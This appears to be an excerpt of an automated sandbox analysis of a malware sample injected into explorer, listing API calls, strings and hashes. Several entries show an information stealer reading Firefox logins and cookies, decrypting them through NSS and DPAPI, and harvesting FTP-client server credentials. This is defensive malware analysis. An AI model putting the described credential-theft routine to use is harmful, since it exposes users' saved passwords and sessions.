                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                  • API String ID: 3298025750-4030396798
                                                                                  • Opcode ID: b5f2a9b7d0eda005e187b37e8ef4950ca9cfa4b5ae7f15294bfb013b073f98cc
                                                                                  • Instruction ID: c13f82aeb35fe1347fa543c56baec0c971b832fbe06aa0d85e3364075e2c6119
                                                                                  • Opcode Fuzzy Hash: b5f2a9b7d0eda005e187b37e8ef4950ca9cfa4b5ae7f15294bfb013b073f98cc
                                                                                  • Instruction Fuzzy Hash: 44D0C23350830577C2012BE4EC11F3B772CABA5B00F04044CF204524A5D3B454A1A721
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1357844191-0
                                                                                  • Opcode ID: c6482e2e49709cb7293fd99a2f730c5bef26e101b51446a86f5aedf76db6e4a3
                                                                                  • Instruction ID: 5c5031a6eceb691dd705605fa27a987b358663610dcf284b8b2cbc284140c018
                                                                                  • Opcode Fuzzy Hash: c6482e2e49709cb7293fd99a2f730c5bef26e101b51446a86f5aedf76db6e4a3
                                                                                  • Instruction Fuzzy Hash: CAA002B55506005BDD4457A59D0DA1A3938A7C5701F408554714D854519D6554C4CB21
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlZeroMemory.NTDLL(?,00000018), ref: 00121303
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryZero
                                                                                  • String ID:
                                                                                  • API String ID: 816449071-0
                                                                                  • Opcode ID: 3a7af5ef1b14bd41f4477e93e6010fccb9d9090bf5074046f268cd1d617dc335
                                                                                  • Instruction ID: 52e1478145d52d942d238f1ca6aa7e9aa024f6bad8d7f23d708a2e865fe17e86
                                                                                  • Opcode Fuzzy Hash: 3a7af5ef1b14bd41f4477e93e6010fccb9d9090bf5074046f268cd1d617dc335
                                                                                  • Instruction Fuzzy Hash: 1F11F8B5A01219AFDB10DFA5EC88ABEB7BDFB58351B500029F945E3640D730DE81CB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 0012B656
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 5a049e3d4868bd484f16d9b72ff9cd3b33bbde7cd448f4a90f0be1766015d191
                                                                                  • Instruction ID: abc8ad32d4da4601c8962d4007138573b4b204365cdff1124317bc19ee30201d
                                                                                  • Opcode Fuzzy Hash: 5a049e3d4868bd484f16d9b72ff9cd3b33bbde7cd448f4a90f0be1766015d191
                                                                                  • Instruction Fuzzy Hash: 2BF0B131A0823C6AD71499BDBC856EEF7ACDF48754F014526E954E2090E3704D6987D0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0012184C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateGlobalStream
                                                                                  • String ID:
                                                                                  • API String ID: 2244384528-0
                                                                                  • Opcode ID: c47caec4a35c90d203b530f896201038e9cbc9986e2eb67e4ffa0a3dcf86f9c7
                                                                                  • Instruction ID: 8f3b2396d7cb8d62439e3196a8f2df4ece0dfe8d72edb90b1e4acf13f06f0bdf
                                                                                  • Opcode Fuzzy Hash: c47caec4a35c90d203b530f896201038e9cbc9986e2eb67e4ffa0a3dcf86f9c7
                                                                                  • Instruction Fuzzy Hash: BBC01230120232EEEB201B30A909B8636E5AF297A2F02083DE28499080E7A408C08691
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00121730), ref: 00121056
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 84b6cf383a23aa3d68e6de86f2cce2894c2013998eca807e254dc7cb79966b3f
                                                                                  • Instruction ID: 67a01a4ab1015e191de99f1a4f258a7b20cf1df63400e263ea65b6fac3fae834
                                                                                  • Opcode Fuzzy Hash: 84b6cf383a23aa3d68e6de86f2cce2894c2013998eca807e254dc7cb79966b3f
                                                                                  • Instruction Fuzzy Hash: 8FA002F07D57007AFD695762AE1FF1529389740F02F100244B30D7C4D055E87584852D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00124869,?,?,00000000,?,?,?,?,00124974,?), ref: 00121065
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: 0471555398346137fa072c5d908d875f0a7cbb427b032957b7ee7d10ff36a255
                                                                                  • Instruction ID: 520ef5688e305f1ffdce7ca208455f239fae5058118786feecf30a30ce5185f0
                                                                                  • Opcode Fuzzy Hash: 0471555398346137fa072c5d908d875f0a7cbb427b032957b7ee7d10ff36a255
                                                                                  • Instruction Fuzzy Hash: 50A00270690B0066ED7457605D0EF0577247780B02F7445447245695D29AA5B0848A18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(001762A0,00000000,00000001,00176290,?), ref: 0012426D
                                                                                  • SysAllocString.OLEAUT32(?), ref: 001242B8
                                                                                  • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0012437C
                                                                                  • lstrcmpiW.KERNEL32(Servers,?), ref: 0012438B
                                                                                  • lstrcmpiW.KERNEL32(Settings,?), ref: 0012439A
                                                                                    • Part of subcall function 0012122F: lstrlenW.KERNEL32(?,7556D5B5,00000000,?,00000000,?,001244F1), ref: 0012123B
                                                                                    • Part of subcall function 0012122F: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0012125D
                                                                                    • Part of subcall function 0012122F: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0012127F
                                                                                  • lstrcmpiW.KERNEL32(Server,?), ref: 001243CC
                                                                                  • lstrcmpiW.KERNEL32(LastServer,?), ref: 001243DB
                                                                                  • lstrcmpiW.KERNEL32(Host,?), ref: 00124465
                                                                                  • lstrcmpiW.KERNEL32(Port,?), ref: 00124487
                                                                                  • lstrcmpiW.KERNEL32(User,?), ref: 001244AD
                                                                                  • lstrcmpiW.KERNEL32(Pass,?), ref: 001244D3
                                                                                  • wsprintfW.USER32 ref: 0012452C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                  • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                  • API String ID: 2230072276-1234691226
                                                                                  • Opcode ID: ea8e53831c104500533a9311752f01a51eaf476b3ed9ba853c48e95474352ef5
                                                                                  • Instruction ID: d2838031a2cbb95003f50a1794c506f608d587d5588fa31407b2dea1e24dbe9d
                                                                                  • Opcode Fuzzy Hash: ea8e53831c104500533a9311752f01a51eaf476b3ed9ba853c48e95474352ef5
                                                                                  • Instruction Fuzzy Hash: DFB1F271204312AFD700DF64D884E6AB7F9EFC9748F00895CF5899B260DB71E85ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memcmp.NTDLL ref: 00174310
                                                                                  • memcmp.NTDLL ref: 0017456D
                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00174611
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp$memcpy
                                                                                  • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                  • API String ID: 231171946-1096842476
                                                                                  • Opcode ID: 6b6b44b296e7796418c906ec9830c8dce2b16e0f790ca5a5e4a8393d37b658c9
                                                                                  • Instruction ID: 938ab7d9729c203c685bd152f9ae70d99383b4af552ea876b3c50a9891b9d93e
                                                                                  • Opcode Fuzzy Hash: 6b6b44b296e7796418c906ec9830c8dce2b16e0f790ca5a5e4a8393d37b658c9
                                                                                  • Instruction Fuzzy Hash: C4C10170A083528BDB38CE28949077BB7F1BF99314F15892DF8DE87282D734D9468796
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00122CAD
                                                                                  • lstrcmpiW.KERNEL32(?,001762BC), ref: 00122CD3
                                                                                  • lstrcmpiW.KERNEL32(?,001762C0), ref: 00122CEB
                                                                                    • Part of subcall function 00121B7C: lstrlenW.KERNEL32(00000000,00000000,00000000,00122E1F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00121B8C
                                                                                  • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00122D57
                                                                                  • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00122D86
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00122DB3
                                                                                  • FindClose.KERNEL32(00000000), ref: 00122DC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                  • String ID: \*.*$cookies.sqlite$logins.json
                                                                                  • API String ID: 1108783765-3717368146
                                                                                  • Opcode ID: 14dd0c2d8cf2dd1ba846f60f3cb4c3e63b3ed691de5371e7dbf47d96bf5ba08f
                                                                                  • Instruction ID: c6c17b0763d7d76c1733028f4f1175ffac80a7fc3ac653b2c5aedb3e3200546b
                                                                                  • Opcode Fuzzy Hash: 14dd0c2d8cf2dd1ba846f60f3cb4c3e63b3ed691de5371e7dbf47d96bf5ba08f
                                                                                  • Instruction Fuzzy Hash: F831B5303047256BCB14EB70BC8593E72BAAFE4740B44492CF849D3292EF79CD669656
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 001268B8: memset.NTDLL ref: 001268D3
                                                                                  • memset.NTDLL ref: 00145D61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                  • API String ID: 2221118986-594550510
                                                                                  • Opcode ID: e23880c8aceb2a7c38f6a03d9b3fb9c09393b277c47dd210413666dfcb0996f6
                                                                                  • Instruction ID: 225269034baf13850234ebf8c024644d846efd1e495b7160731db328aa2638e0
                                                                                  • Opcode Fuzzy Hash: e23880c8aceb2a7c38f6a03d9b3fb9c09393b277c47dd210413666dfcb0996f6
                                                                                  • Instruction Fuzzy Hash: 92C19F70A047019FCB14DF24C481A2AB7E2FFD8714F14892DF89997292DB31ED56CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00123C59,00000000), ref: 00121298
                                                                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 001212B6
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 001212E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 117552131-0
                                                                                  • Opcode ID: db579d839b700c3cfc59ea18110236209243994e0bd564beb02826d422e5a669
                                                                                  • Instruction ID: 9e6e314156045c5a6a4fa9d52aed275df0862137a36a88da7892dfc80fcb4448
                                                                                  • Opcode Fuzzy Hash: db579d839b700c3cfc59ea18110236209243994e0bd564beb02826d422e5a669
                                                                                  • Instruction Fuzzy Hash: B4016271204315BFE718CF51DC89EBBB7ACEB94651F00452EF505C6650DBA1DC458A70
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,7556D5B5,00000000,?,00000000,?,001244F1), ref: 0012123B
                                                                                  • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0012125D
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0012127F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 117552131-0
                                                                                  • Opcode ID: d158ab33905e531d3799ca0f1fc20499fc4c00f8a0ff367d3cf326dba37ae7fe
                                                                                  • Instruction ID: def37117c59ce39feec64495e0b925842601759d837e9b8d6c82a987c4098f54
                                                                                  • Opcode Fuzzy Hash: d158ab33905e531d3799ca0f1fc20499fc4c00f8a0ff367d3cf326dba37ae7fe
                                                                                  • Instruction Fuzzy Hash: 3CF0907220431E7FE210DE56EC81FA7BB9DDBA1794F25002EBA01D2181DE92EC4982B4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0012216A
                                                                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 00122185
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataMemoryMoveUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 2807545630-0
                                                                                  • Opcode ID: 4fffc7b8e2f7a974002430f4311543782a5a5382e5274daa6858a118397a8013
                                                                                  • Instruction ID: b83baa8fd6e28c3beed5154454ec97167141789bf02474b6f8a770d5394df1bf
                                                                                  • Opcode Fuzzy Hash: 4fffc7b8e2f7a974002430f4311543782a5a5382e5274daa6858a118397a8013
                                                                                  • Instruction Fuzzy Hash: F401E1B1B01229BB9B24DF99EC84DAFBBBCEF55751B10046AF905D3200D7709E608BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 00121200
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 00121220
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3825993179-0
                                                                                  • Opcode ID: 8fc2f23abde941fe62246d1497d1c4bb9c7f404f64986ef4225664919f518c57
                                                                                  • Instruction ID: 4eddd8f059a547cf20369a29dcb2a6402ca1f5bc3acf6979fa068117b0fdbcf0
                                                                                  • Opcode Fuzzy Hash: 8fc2f23abde941fe62246d1497d1c4bb9c7f404f64986ef4225664919f518c57
                                                                                  • Instruction Fuzzy Hash: 28F0A732600128BBD720C696EC84DEBFB7DDF957A1B100169B90DD3140DA629D4482E0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                    • Part of subcall function 00121090: lstrlenW.KERNEL32(?,?,00000000,001219AD), ref: 00121097
                                                                                    • Part of subcall function 00121090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 001210A8
                                                                                    • Part of subcall function 00121B7C: lstrlenW.KERNEL32(00000000,00000000,00000000,00122E1F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00121B8C
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00122673
                                                                                  • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0012267A
                                                                                  • LoadLibraryW.KERNEL32(00000000), ref: 001226D3
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 001226E0
                                                                                  • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00122701
                                                                                  • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0012270E
                                                                                  • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 0012271B
                                                                                  • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00122728
                                                                                  • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00122735
                                                                                  • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00122742
                                                                                  • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0012274F
                                                                                    • Part of subcall function 00121AD3: lstrlen.KERNEL32(?,?,?,?,00000000,001228F3), ref: 00121AF3
                                                                                    • Part of subcall function 00121AD3: lstrlen.KERNEL32(00000000,?,?,?,00000000,001228F3), ref: 00121AF8
                                                                                    • Part of subcall function 00121AD3: lstrcat.KERNEL32(00000000,?), ref: 00121B0E
                                                                                    • Part of subcall function 00121AD3: lstrcat.KERNEL32(00000000,00000000), ref: 00121B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                  • API String ID: 3366569387-3272982511
                                                                                  • Opcode ID: 884dbc81ad91832e0b9f8f26c4660952ab9e7ba05ee097f694d055a3f8977c7d
                                                                                  • Instruction ID: 83aad08074ca9146675bf88552488bfaeae100260689a7551db15dcfa770854b
                                                                                  • Opcode Fuzzy Hash: 884dbc81ad91832e0b9f8f26c4660952ab9e7ba05ee097f694d055a3f8977c7d
                                                                                  • Instruction Fuzzy Hash: 84414532A04775BBCB18AF797C4442E7AF99FB4780700042EFA05D3651EF388C9A8B51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00125A03: memset.NTDLL ref: 00125A15
                                                                                  • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00125EEF
                                                                                  • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00125EFA
                                                                                  • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00125F21
                                                                                  • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00125F9C
                                                                                  • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00125FC3
                                                                                  • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00125FCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _alldiv$_allrem$memset
                                                                                  • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                  • API String ID: 2557048445-1989508764
                                                                                  • Opcode ID: 8e60795c8290609dbd0160b6dee481197b8d55c7e84c29717de58a5caa6a8002
                                                                                  • Instruction ID: 6d598ebfe6acb4fc5fa4e0dc95d8856d897ab7d59d912e2cfa3d7b6a9b2d3ec7
                                                                                  • Opcode Fuzzy Hash: 8e60795c8290609dbd0160b6dee481197b8d55c7e84c29717de58a5caa6a8002
                                                                                  • Instruction Fuzzy Hash: 23B1BEB2908766ABD3259E64FCC9B3B7FD6FB40344F290959F486A21D2E730CD308695
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp
                                                                                  • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                  • API String ID: 1475443563-3683840195
                                                                                  • Opcode ID: bd2c302a5ac2d2d44e6d5f8bd8ef1821f6b07174f1a0faa476484d6af5f69587
                                                                                  • Instruction ID: 953b3006287db2c8cd13a01955f2f1ba81a8f407541f2fe4e907aa31bc96061f
                                                                                  • Opcode Fuzzy Hash: bd2c302a5ac2d2d44e6d5f8bd8ef1821f6b07174f1a0faa476484d6af5f69587
                                                                                  • Instruction Fuzzy Hash: 675122325483009BC725DF90FC41A67B7B6EF94310F158829FC999B281EB30E919CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00122C42
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00122B51
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00122B5C
                                                                                  • wsprintfA.USER32 ref: 00122BA8
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00122BB4
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00122BDC
                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00122C09
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                  • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                  • API String ID: 304071051-2605711689
                                                                                  • Opcode ID: 2f977042d959a36464d22c6d4fa3c381a6844aa7195b8256ff0a7b995fed0b63
                                                                                  • Instruction ID: c0efe293e1ed3e5baf4690b54d46d1402ce4c0849a0904ecdbf2031762618267
                                                                                  • Opcode Fuzzy Hash: 2f977042d959a36464d22c6d4fa3c381a6844aa7195b8256ff0a7b995fed0b63
                                                                                  • Instruction Fuzzy Hash: 7251A130208396AFD725EF21A891B3F77E5AFA5344F04082CF4859B252DB35DD69C752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                    • Part of subcall function 00121D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121D4A
                                                                                    • Part of subcall function 00121D32: CloseHandle.KERNEL32(00000000), ref: 00121D57
                                                                                  • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00122E83
